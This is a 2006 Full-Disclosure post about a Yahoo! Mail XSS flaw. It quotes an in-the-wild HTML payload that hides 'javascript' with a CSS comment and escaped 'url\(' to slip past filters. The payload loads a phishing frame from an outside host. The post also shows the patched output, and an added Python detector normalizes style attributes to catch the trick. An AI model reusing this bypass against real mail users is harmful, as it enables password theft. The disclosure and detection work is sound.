
| Subject: | [Full-disclosure] [Argeniss] Alert - Yahoo! Mail XSS vulnerability |
|---|---|
| Date: | Fri, 28 Apr 2006 10:08:44 -0700 (PDT) |
Yahoo! Mail XSS vulnerability
Description:
Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicious script being executed on users'
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail login
web page, I could realize about this because a strange
domain was displayed on IE status bar.
When looking at the HTML code I found out that the
message was:
...Message text ...<BR><BR><a target="_blank"
href="www.blabla23.com>"style="background:url\(java/**/script:document.write('<frameset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><frame frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>
You can see that the attacker used some tricks to
bypass filters, but we can't know all the tricks the
attacker used because some chars were removed or
replaced by the filter. That script loaded a fake
Yahoo! Mail login web page in order to steal
passwords.
Yahoo! was contacted and they responded that the issue
was going to be fixed, after that I haven't heard any
news about them. It seems that the issue was fixed
because now the same message is displayed as:
...Message text ...<BR><BR><a target="_blank"
href="www.blabla23.com>"style="background:url\(_java/**/script:document.write('<xframeset
cols=100% rows=100% border=0
frameboarder=0framespacing=0><xframe frameborder=0
src=http://w00tynetwork.com/x/></frameset>'))"></a><p>
Now filters were improved, whenever the word
javascript appears a "_" is appended at the beginning,
and a "x" is appended at the beginning of dangerous
HTML tags.
Again Yahoo! didn't release any advisory nor
contacted customers about this issue.
This issue was exploited for long time by malicious
people for stealing passwords and cookies in order to
compromise Yahoo! Mail users' accounts, so it's very
important that Yahoo! Mail users change their
passwords just in case their accounts were
compromised.
Cesar.
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam
protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
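
Added example, not part of the original post and not Yahoo!'s filter code: a Python check that a webmail filter could run on style attributes, undoing the CSS comment and backslash visible in the message before looking for a script URL, next to a literal keyword match that misses it. All function names and sample strings are constructed for illustration.

```python
import re
from html.parser import HTMLParser

CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SCRIPT_URL = re.compile(r"url\(['\"]?javascript:")


def normalize_css(value):
    """Undo the two obfuscations visible in the message's style value."""
    value = CSS_COMMENT.sub("", value)   # "java/**/script" -> "javascript"
    value = value.replace("\\", "")      # "url\(" -> "url("
    value = re.sub(r"\s+", "", value)    # whitespace and wrapped lines
    return value.lower()


def naive_match(text):
    """Literal keyword match on the raw text, with no normalization."""
    return "javascript" in text.lower()


class StyleScanner(HTMLParser):
    """Collects (tag, normalized style) for styles holding a script URL."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name == "style" and value:
                css = normalize_css(value)
                if SCRIPT_URL.search(css):
                    self.findings.append((tag, css))


def scan_message(html):
    scanner = StyleScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed samples (hypothetical): the pattern from the message with an
# inert payload, and a benign style that must not be flagged.
SUSPECT = ('<a target="_blank" href="http://example.invalid/" '
           'style="background:url\\(java/**/script:void(0))">x</a>')
BENIGN = '<p style="background:url(http://example.invalid/bg.png)">hi</p>'

if __name__ == "__main__":
    print(scan_message(SUSPECT), scan_message(BENIGN), naive_match(SUSPECT))
```

A filter that finds anything here is usually better off dropping the whole style attribute than rewriting the matched keyword.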